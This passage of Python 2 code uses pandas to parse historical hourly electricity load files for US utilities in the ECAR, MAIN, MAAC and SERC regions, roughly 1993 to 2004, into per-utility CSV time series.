1997 : pd.read_fwf('%s/ecar/1997/FE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/FE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/FE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/FE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/FE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/FE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/FE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/FE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
'mccp' : {
1993 : pd.read_fwf('%s/ecar/1993/MCCP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/MCCP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/MCCP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/MCCP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/MCCP01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/MCCP02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/MCCP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/MCCP04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
}
}
if not os.path.exists('./ecar'):
os.mkdir('ecar')
for k in ecar.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(ecar[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(ecar[k][i]))) for i in ecar[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./ecar/%s.csv' % k)
###### MAIN
# CECO : 4110
# CILC: 3252 <- Looks like something is getting cut off from 1993-2000
# CIPS: 3253
# IPC: 9208
# MGE: 11479
# SIPC: 17632
# SPIL: 17828
# UE: 19436
# WEPC: 20847
# WPL: 20856
# WPS: 20860
# UPP: 19578
# WPPI: 20858
# AMER: 19436
# CWL: 4045
main = {
4110 : {
1993 : pd.read_fwf('%s/main/1993/CECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/main/1995/CECO95' % (fulldir), skiprows=3, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/CECO96' % (fulldir), skiprows=4, header=None)[1].values,
1997 : pd.read_csv('%s/main/1997/CECO97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=4, header=None)[3].values,
1998 : pd.read_csv('%s/main/1998/CECO98' % (fulldir), sep='\s', skipinitialspace=True, skiprows=5, header=None)[5].values,
1999 : pd.read_csv('%s/main/1999/CECO99' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2000 : pd.read_csv('%s/main/2000/CECO00' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2001 : pd.read_csv('%s/main/2001/CECO01' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2002 : pd.read_csv('%s/main/2002/CECO02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None)[2].values
},
3252 : {
1993 : pd.read_fwf('%s/main/1993/CILC93' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/CILC94' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/CILC95' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1996 : pd.read_fwf('%s/main/1996/CILC96' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1997 : pd.read_fwf('%s/main/1997/CILC97' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1998 : pd.read_fwf('%s/main/1998/CILC98' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1999 : pd.read_fwf('%s/main/1999/CILC99' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
2000 : pd.read_excel('%s/main/2000/CILC00' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2001 : pd.read_excel('%s/main/2001/CILC01' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2002 : pd.read_excel('%s/main/2002/CILC02' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2003 : pd.read_csv('%s/main/2003/CILC03' % (fulldir), skiprows=1, sep='\t').iloc[:, -1].values
},
3253 : {
1993 : pd.read_fwf('%s/main/1993/CIPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/CIPS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/CIPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/main/1996/CIPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/main/1997/CIPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9208 : {
1993 : pd.read_csv('%s/main/1993/IPC93' % (fulldir), skipfooter=1, header=None)[2].values,
1994 : pd.read_csv('%s/main/1994/IPC94' % (fulldir), skipfooter=1, header=None)[2].values,
1995 : pd.read_csv('%s/main/1995/IPC95' % (fulldir), skipfooter=1, header=None)[4].astype(str).str.replace('.', '0').astype(float).values,
1996 : pd.read_csv('%s/main/1996/IPC96' % (fulldir)).iloc[:, -1].values,
1997 : pd.read_csv('%s/main/1997/IPC97' % (fulldir)).iloc[:, -1].values,
1998 : pd.read_excel('%s/main/1998/IPC98' % (fulldir)).iloc[:, -1].values,
1999 : pd.read_csv('%s/main/1999/IPC99' % (fulldir), skiprows=2, header=None)[1].values,
2000 : pd.read_excel('%s/main/2000/IPC00' % (fulldir), skiprows=1).iloc[:, -1].values,
2001 : pd.read_excel('%s/main/2001/IPC01' % (fulldir), skiprows=1).iloc[:, -1].values,
2002 : pd.read_excel('%s/main/2002/IPC02' % (fulldir), skiprows=4).iloc[:, -1].values,
2003 : pd.read_excel('%s/main/2003/IPC03' % (fulldir), skiprows=1).iloc[:, -1].values,
2004 : pd.read_excel('%s/main/2004/IPC04' % (fulldir), skiprows=1).iloc[:, -1].values
},
11479 : {
1993 : pd.read_fwf('%s/main/1993/MGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=4).iloc[:, 1:].dropna().astype(float).values.ravel(),
1995 : pd.read_csv('%s/main/1995/MGE95' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
1997 : pd.read_csv('%s/main/1997/MGE97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=12, header=None).iloc[:-1, 2].astype(float).values,
1998 : pd.read_csv('%s/main/1998/MGE98' % (fulldir), sep=' ', skipinitialspace=True).iloc[:-1]['LOAD'].astype(float).values,
1999 : pd.read_csv('%s/main/1999/MGE99' % (fulldir), sep=' ', skiprows=2, header=None, skipinitialspace=True).iloc[:-2, 2].astype(float).values,
2000 : pd.read_csv('%s/main/2000/MGE00' % (fulldir), sep=' ', skiprows=3, header=None, skipinitialspace=True, skipfooter=2).iloc[:, 2].astype(float).values,
2000 : pd.read_fwf('%s/main/2000/MGE00' % (fulldir), skiprows=2)['VMS_DATE'].iloc[:-2].str.split().str[-1].astype(float).values,
2001 : pd.read_fwf('%s/main/2001/MGE01' % (fulldir), skiprows=1, header=None).iloc[:-2, 2].values,
2002 : pd.read_fwf('%s/main/2002/MGE02' % (fulldir), skiprows=4, header=None).iloc[:-1, 0].str.split().str[-1].astype(float).values
},
17632 : {
1994 : pd.read_csv('%s/main/1994/SIPC94' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/SIPC96' % (fulldir), engine='python', header=None)[0].values,
1997 : pd.read_csv('%s/main/1997/SIPC97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/main/1998/SIPC98' % (fulldir), engine='python', header=None)[0].values,
1999 : pd.read_csv('%s/main/1999/SIPC99' % (fulldir), engine='python', header=None)[0].replace('no data', '0').astype(float).values,
2000 : pd.read_csv('%s/main/2000/SIPC00' % (fulldir), engine='python', header=None)[0].astype(str).str[:3].astype(float).values,
2001 : pd.read_csv('%s/main/2001/SIPC01' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values,
2002 : pd.read_csv('%s/main/2002/SIPC02' % (fulldir), sep='\t', skiprows=3, header=None)[1].values,
2003 : pd.read_csv('%s/main/2003/SIPC03' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values,
2004 : pd.read_csv('%s/main/2004/SIPC04' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values
},
17828 : {
1993 : pd.read_csv('%s/main/1993/SPIL93' % (fulldir), sep=' ', skipinitialspace=True, skiprows=4, header=None).iloc[:, 3:].values.ravel(),
1994 : pd.read_csv('%s/main/1994/SPIL94' % (fulldir), sep=' ', skipinitialspace=True, skiprows=6, header=None).iloc[:, 3:].values.ravel(),
1995 : pd.read_csv('%s/main/1995/SPIL95' % (fulldir), sep=' ', skipinitialspace=True, skiprows=7, header=None).iloc[:, 3:].values.ravel(),
1996 : pd.read_csv('%s/main/1996/SPIL96' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).iloc[:366, 3:].astype(float).values.ravel(),
1997 : pd.read_csv('%s/main/1997/SPIL97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=7, header=None).iloc[:, 3:].values.ravel(),
1998 : pd.read_csv('%s/main/1998/SPIL98' % (fulldir), sep='\t', skipinitialspace=True, skiprows=8, header=None).iloc[:, 4:].values.ravel(),
1999 : pd.read_csv('%s/main/1999/SPIL99' % (fulldir), skiprows=4, header=None)[0].values,
2000 : pd.read_csv('%s/main/2000/SPIL00' % (fulldir), skiprows=4, header=None)[0].values,
2001 : pd.read_csv('%s/main/2001/SPIL01' % (fulldir), sep='\t', skipinitialspace=True, skiprows=7, header=None).iloc[:, 5:-1].values.ravel(),
2002 : pd.read_excel('%s/main/2002/SPIL02' % (fulldir), sheetname=2, skiprows=5).iloc[:, 3:].values.ravel(),
2003 : pd.read_excel('%s/main/2003/SPIL03' % (fulldir), sheetname=2, skiprows=5).iloc[:, 3:].values.ravel(),
2004 : pd.read_excel('%s/main/2004/SPIL04' % (fulldir), sheetname=0, skiprows=5).iloc[:, 3:].values.ravel()
},
19436 : {
1995 : pd.read_fwf('%s/main/1995/UE95' % (fulldir), header=None)[2].values,
1996 : pd.read_fwf('%s/main/1996/UE96' % (fulldir), header=None)[2].values,
1997 : pd.read_fwf('%s/main/1997/UE97' % (fulldir), header=None)[2].values
},
20847 : {
1993 : pd.read_csv('%s/main/1993/WEPC93' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1994 : pd.read_csv('%s/main/1994/WEPC94' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1995 : pd.read_csv('%s/main/1995/WEPC95' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/WEPC96' % (fulldir), engine='python', header=None)[0].values,
1997 : pd.read_excel('%s/main/1997/WEPC97' % (fulldir), header=None)[0].astype(str).str.strip().replace('NA', '0').astype(float).values,
1998 : pd.read_csv('%s/main/1998/WEPC98' % (fulldir), engine='python', header=None)[0].str.strip().replace('NA', 0).astype(float).values,
1999 : pd.read_excel('%s/main/1999/WEPC99' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_excel('%s/main/2000/WEPC00' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_excel('%s/main/2001/WEPC01' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_excel('%s/main/2002/WEPC02' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2003 : pd.read_excel('%s/main/2003/WEPC03' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2004 : pd.read_excel('%s/main/2004/WEPC04' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
20856 : {
1993 : pd.read_fwf('%s/main/1993/WPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/WPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/WPL95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/main/1996/WPL96' % (fulldir), header=None, sep='\t').iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/main/1997/WPL97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=1, header=None)[2].str.replace(',', '').astype(float).values
},
20860 : {
1993 : pd.read_csv('%s/main/1993/WPS93' % (fulldir), sep=' ', header=None, skipinitialspace=True, skipfooter=1).values.ravel(),
1994 : (pd.read_csv('%s/main/1994/WPS94' % (fulldir), sep=' ', header=None, skipinitialspace=True, skipfooter=1).iloc[:, 1:-1]/100).values.ravel(),
1995 : pd.read_csv('%s/main/1995/WPS95' % (fulldir), sep=' ', skipinitialspace=True, skiprows=8, header=None, skipfooter=7)[2].values,
1996 : pd.read_csv('%s/main/1996/WPS96' % (fulldir), sep='\t', skiprows=2).loc[:365, '100':'2400'].astype(float).values.ravel(),
1997 : pd.read_csv('%s/main/1997/WPS97' % (fulldir), sep='\s', header=None, skipfooter=1)[2].values,
1998 : pd.read_csv('%s/main/1998/WPS98' % (fulldir), sep='\s', header=None)[2].values,
1999 : pd.read_excel('%s/main/1999/WPS99' % (fulldir), skiprows=8, skipfooter=8, header=None)[1].values,
2000 : pd.read_excel('%s/main/2000/WPS00' % (fulldir), sheetname=1, skiprows=5, skipfooter=8, header=None)[2].values,
2001 : pd.read_excel('%s/main/2001/WPS01' % (fulldir), sheetname=0, skiprows=5, header=None)[2].values,
2002 : pd.read_csv('%s/main/2002/WPS02' % (fulldir), sep='\s', header=None, skiprows=5)[2].values,
2003 : pd.read_excel('%s/main/2003/WPS03' % (fulldir), sheetname=1, skiprows=6, header=None)[2].values
},
19578 : {
1996 : pd.read_csv('%s/main/1996/UPP96' % (fulldir), header=None, skipfooter=1).iloc[:, -1].values,
2004 : pd.read_excel('%s/main/2004/UPP04' % (fulldir)).iloc[:, -1].values
},
20858 : {
1997 : pd.read_csv('%s/main/1997/WPPI97' % (fulldir), skiprows=5, sep=' ', skipinitialspace=True, header=None).iloc[:, 1:-1].values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/main/1999/WPPI99' % (fulldir)).readlines()[5:]]).iloc[:, 1:-1].astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/main/2000/WPPI00' % (fulldir)).readlines()[5:]]).iloc[:, 1:-1].astype(float).values.ravel(),
2001 : pd.read_excel('%s/main/2001/WPPI01' % (fulldir), sheetname=1, skiprows=4).iloc[:, 1:-1].values.ravel(),
2002 : pd.read_excel('%s/main/2002/WPPI02' % (fulldir), sheetname=1, skiprows=4).iloc[:, 1:-1].values.ravel()
},
19436 : {
1998 : pd.read_csv('%s/main/1998/AMER98' % (fulldir), sep='\t').iloc[:, -1].str.strip().replace('na', 0).astype(float).values,
1999 : pd.read_csv('%s/main/1999/AMER99' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2000 : pd.read_csv('%s/main/2000/AMER00' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2001 : pd.read_csv('%s/main/2001/AMER01' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('n/a', 0).astype(float).values,
2002 : pd.read_csv('%s/main/2002/AMER02' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2003 : pd.read_csv('%s/main/2003/AMER03' % (fulldir), sep='\t', skiprows=1).iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2004 : pd.read_csv('%s/main/2004/AMER04' % (fulldir), sep='\t', skiprows=1).iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values
},
4045 : {
2000 : pd.read_excel('%s/main/2000/CWL00' % (fulldir), skiprows=2).iloc[:, 1:].values.ravel(),
2001 : pd.read_excel('%s/main/2001/CWL01' % (fulldir), skiprows=1).iloc[:, 0].values,
2002 : pd.read_excel('%s/main/2002/CWL02' % (fulldir), header=None).iloc[:, 0].values,
2003 : pd.read_excel('%s/main/2003/CWL03' % (fulldir), header=None).iloc[:, 0].values
}
}
main[20847][1994][main[20847][1994] > 9000] = 0
main[20847][1995][main[20847][1995] > 9000] = 0
main[20847][1996][main[20847][1996] > 9000] = 0
if not os.path.exists('./main'):
os.mkdir('main')
for k in main.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(main[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(main[k][i]))) for i in main[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./main/%s.csv' % k)
# EEI
# Bizarre formatting until 1998
###### MAAC
# AE: 963
# BC: 1167
# DPL: 5027
# PU: 7088
# PN: 14715
# PE: 14940
# PEP: 15270
# PS: 15477
# PJM: 14725
# ALL UTILS
maac93 = pd.read_fwf('%s/maac/1993/PJM93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1)
maac94 = pd.read_fwf('%s/maac/1994/PJM94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1)
maac95 = pd.read_csv('%s/maac/1995/PJM95' % (fulldir), sep='\t', header=None, skipfooter=1)
maac96 = pd.read_csv('%s/maac/1996/PJM96' % (fulldir), sep='\t', header=None, skipfooter=1)
maac = {
963 : {
1993 : maac93[maac93[0].str.contains('AE')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('AE')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('AE')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('AE')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='ACE_LOAD').iloc[:, 1:25].values.ravel()
},
1167 : {
1993 : maac93[maac93[0].str.contains('BC')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('BC')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('BC')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('BC')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='BC_LOAD').iloc[:, 1:25].values.ravel()
},
5027 : {
1993 : maac93[maac93[0].str.contains('DP')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('DP')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('DP')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('DP')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='DPL_LOAD').iloc[:366, 1:25].values.ravel()
},
7088 : {
1993 : maac93[maac93[0].str.contains('PU')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PU')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PU')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PU')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='GPU_LOAD').iloc[:366, 1:25].values.ravel()
},
14715 : {
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PN_LOAD').iloc[:366, 1:25].values.ravel()
},
14940 : {
1993 : maac93[maac93[0].str.contains('PE$')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PE$')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PE$')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PE$')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PE_Load').iloc[:366, 1:25].values.ravel()
},
15270 : {
1993 : maac93[maac93[0].str.contains('PEP')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PEP')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PEP')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PEP')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PEP_LOAD').iloc[:366, 1:25].values.ravel()
},
15477 : {
1993 : maac93[maac93[0].str.contains('PS')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PS')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PS')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PS')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PS_Load').iloc[:366, 1:25].values.ravel()
},
14725 : {
1993 : maac93[maac93[0].str.contains('PJM')].iloc[:, 1:].values.ravel(),
1994 : maac94[maac94[0].str.contains('PJM')].iloc[:, 1:].values.ravel(),
1995 : maac95[maac95[1].str.contains('PJM')].iloc[:, 2:].values.ravel(),
1996 : maac96[maac96[1].str.contains('PJM')].iloc[:, 2:].values.ravel(),
1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PJM_LOAD').iloc[:366, 1:25].values.ravel(),
1998 : pd.read_csv('%s/maac/1998/PJM98' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
1999 : pd.read_excel('%s/maac/1999/PJM99' % (fulldir), header=None)[2].values,
2000 : pd.read_excel('%s/maac/2000/PJM00' % (fulldir), header=None)[2].values
}
}
if not os.path.exists('./maac'):
os.mkdir('maac')
for k in maac.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(maac[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(maac[k][i]))) for i in maac[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./maac/%s.csv' % k)
###### SERC
# AEC: 189
# CPL: 3046
# CEPC: 40218
# CEPB: 3408
# MEMP: 12293
# DUKE: 5416
# FPWC: 6235 *
# FLINT: 6411
# GUC: 7639
# LCEC: 10857
# NPL: 13204
# OPC: 13994
# SCEG: 17539
# SCPS: 17543
# SMEA: 17568
# TVA: 18642
# VIEP: 19876
# WEMC: 20065
# DU: 4958
# AECI: 924
# ODEC-D: 402290
# ODEC-V: 402291
# ODEC: 40229
# SOCO-APCO: 195
# SOCO-GPCO: 7140
# SOCO-GUCO: 7801
# SOCO-MPCO: 12686
# SOCO-SECO: 16687 *?
serc = {
189 : {
1993 : pd.read_csv('%s/serc/1993/AEC93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_csv('%s/serc/1994/AEC94' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/serc/1995/AEC95' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/serc/1996/AEC96' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/serc/1997/AEC97' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/serc/1998/AEC98' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/serc/1999/AEC99' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=3).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/serc/2000/AEC00' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
2001 : pd.read_csv('%s/serc/2001/AEC01' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/serc/2002/AEC02' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=4).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/serc/2004/AEC04' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=4).iloc[:, 1:].values.ravel()
},
3046 : {
1994 : pd.read_csv('%s/serc/1994/CPL94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
1995 : pd.read_csv('%s/serc/1995/CPL95' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=5)[1].values,
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/CEPL96' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/CPL97' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/CPL98' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/CPL99' % (fulldir)).readlines()[1:]])[2].astype(float).values,
2000 : pd.read_excel('%s/serc/2000/CPL00' % (fulldir))['Load'].values,
2001 : pd.read_excel('%s/serc/2001/CPL01' % (fulldir))['Load'].values,
2002 : pd.read_excel('%s/serc/2002/CPL02' % (fulldir))['Load'].values,
2003 : pd.read_excel('%s/serc/2003/CPL03' % (fulldir))['Load'].values,
2004 : pd.read_excel('%s/serc/2004/CPL04' % (fulldir))['Load'].values
},
40218 : {
1993 : pd.read_fwf('%s/serc/1993/CEPC93' % (fulldir), header=None).iloc[:, 1:-1].values.ravel(),
1994 : pd.read_csv('%s/serc/1994/CEPC94' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=1).iloc[:, 1:-1].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/serc/1995/CEPC95' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:-1].replace('.', '0').astype(float).values.ravel(),
